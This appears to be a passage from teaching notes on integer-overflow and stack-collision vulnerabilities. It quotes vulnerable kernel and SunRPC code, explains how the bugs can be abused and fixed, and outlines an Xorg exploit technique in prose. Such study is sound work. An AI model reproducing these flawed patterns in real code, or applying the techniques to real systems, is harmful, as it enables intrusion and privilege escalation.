static int sg_scsi_ioctl(struct file *file, request_queue_t *q, ... ) { char *buffer = NULL; int bytes; int in_len, out_len; /* two integers */ ... if (get_user(in_len, &sic->inlen)) /* read from user space */ return -EFAULT; if (get_user(out_len, &sic->outlen)) return -EFAULT; if (in_len > PAGE_SIZE || out_len > PAGE_SIZE) return -EINVAL; ... bytes = max(in_len, out_len); if (bytes) { buffer = kmalloc(bytes, q->bounce_gfp | GFP_USER); if (!buffer) return -ENOMEM; memset(buffer, 0, bytes); } ... if (copy_from_user(buffer, sic->data + cmdlen, in_len)) goto error; ... }
Thus, a local user can make in_len
negative, and
out_len
positive, the kernel will allocate a small buffer
and copy a huge amount of user data to kernel memory.
It will be easy to crash the kernel, more difficult to
create an exploit. A requirement is the ability to open at least one
SCSI device and do the SCSI_IOCTL_SEND_COMMAND ioctl.
The routine xdr_array()
in xdr_array.c
contained code
somewhat like
bool_t xdr_array (xdrs, addrp, sizep, maxsize, elsize, elproc) XDR *xdrs; caddr_t *addrp; /* array pointer */ u_int *sizep; /* number of elements */ u_int maxsize; /* max numberof elements */ u_int elsize; /* size in bytes of each element */ xdrproc_t elproc; /* xdr routine to handle each element */ { u_int i; caddr_t target = *addrp; u_int c; bool_t stat = TRUE; u_int nodesize; /* get array length */ if (!xdr_u_int (xdrs, sizep)) return FALSE; c = *sizep; if ((c > maxsize) && (xdrs->x_op != XDR_FREE)) return FALSE; nodesize = c * elsize; /* allocate array */ if (c == 0) return TRUE; *addrp = target = mem_alloc (nodesize); if (target == NULL) { fprintf (stderr, "xdr_array: out of memory\n"); return FALSE; } __bzero (target, nodesize); ...
Here the expression c * elsize
can overflow.
The fix was to replace if (c > maxsize)
by
if (c > maxsize || c > LASTUNSIGNED / elsize)
to make sure that multiplication could not lead to overflow.
There has been a 2002 integer overflow in the SunRPC XDR libraries.
Since these libraries have been copied into many systems, this led
to remote root vulnerability in lots of places, including Sun, *BSD, Linux.
This vulnerability involved the xdr_array()
routine.
The year after, a similar bug was discovered involving the
xdrmem_getbytes()
function.
There has been a 2003 integer overflow in Snort with exploit: if root is running Snort to monitor his network, a remote attacker can get a root shell by sending appropriately crafted packets.
There has been a Jan 2005 integer overflow in libtiff, allowing remote code execution on machines with a user willing to look at one's pictures, e.g., with a browser.
There is a Feb 2008 integer overflow in the Linux kernel, allowing a local root exploit. (See below.)
On most architectures the stack grows downward, the heap grows upward, and mmap also maps regions of memory somewhere. How is stack overflow discovered? By a page fault when a missing stack page is accessed. Now the kernel will either extend the stack by mapping another page there or kill the program with a segfault.
However, the user program can have large arrays on the stack, and the array access can in fact access heap memory or mmap'ed memory. For a user program it is difficult to protect itself against this. The problems were discussed extensively in Gael Delalleu's writeup.
Five years later Rafal Wojtczuk
described
an Xorg
server exploit that uses these ideas.
Fill up the server's address space with pixmaps, then fill up what is left
with shared memory segments, that come up very close to the stack.
Force X to call a recursive function that grows the stack into the
shm segments. No page fault occurs since the memory was allocated already.
Observe which segment changed, and do it again, this time simultaneously
spamming that segment with a pointer to exploit code.
Effectively this is a combination of race and buffer overflow.
If the race is won, a return address is overwritten and exploit code
will be run with the uid of the server, probably root.
As a mitigation, the Linux 2.6.36 kernel now has a guard page below the stack, so that this can happen only with programs that allocate large arrays on the stack.